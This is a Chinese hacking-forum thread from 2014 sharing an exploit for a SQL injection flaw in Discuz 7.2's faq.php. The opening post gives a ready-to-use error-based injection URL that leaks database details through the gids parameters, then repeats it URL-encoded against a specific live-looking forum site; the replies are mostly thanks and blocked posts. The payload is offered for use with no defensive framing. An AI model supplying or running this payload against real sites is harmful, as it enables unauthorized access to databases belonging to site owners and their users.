Discuz 7.2 faq.php SQL注入漏洞

U神V5 · 发表于 2014-7-2 18:48:52

EXP：

[AppleScript] 纯文本查看 复制代码

http://www.xxx.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23

如：

[AppleScript] 纯文本查看 复制代码

http://www.nichijou.cc/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23

zy516668272 · 发表于 2014-7-2 19:27:37

提示: 作者被禁止或删除内容自动屏蔽

广岛秋泽 · 发表于 2014-7-2 19:52:41

小白表示看不懂~

随风淡笑 · 发表于 2014-7-2 20:10:23

支持原创求金币打赏

zy516668272 · 发表于 2014-7-2 21:21:39

提示: 作者被禁止或删除内容自动屏蔽

Puppet。 · 发表于 2014-7-2 23:36:35

提示: 作者被禁止或删除内容自动屏蔽

Puppet。 · 发表于 2014-7-2 23:36:57

提示: 作者被禁止或删除内容自动屏蔽

Dr.ls · 发表于 2014-7-3 00:01:27

o8的水印 logo 还是一如既往的丑掉渣

vivi · 发表于 2014-7-3 12:36:06

感谢分享

f4ckteam · 发表于 2014-7-3 18:01:51

这个也可以试试，这两天好强大吧

zy516668272 zy516668272 当前离线积分 35 头像被屏蔽	发表于 2014-7-2 19:27:37 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
zy516668272 zy516668272 当前离线积分 35 头像被屏蔽
	回复支持反对使用道具举报

zy516668272 zy516668272 当前离线积分 35 头像被屏蔽	发表于 2014-7-2 21:21:39 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
zy516668272 zy516668272 当前离线积分 35 头像被屏蔽
	回复支持反对使用道具举报

Puppet。 Puppet。当前离线积分 211 头像被屏蔽	发表于 2014-7-2 23:36:35 来自手机 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
Puppet。 Puppet。当前离线积分 211 头像被屏蔽
	回复支持反对使用道具举报

Puppet。 Puppet。当前离线积分 211 头像被屏蔽	发表于 2014-7-2 23:36:57 来自手机 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
Puppet。 Puppet。当前离线积分 211 头像被屏蔽
	回复支持反对使用道具举报

Discuz 7.2 faq.php SQL注入漏洞

评分

指导单位

旗下站点

联系我们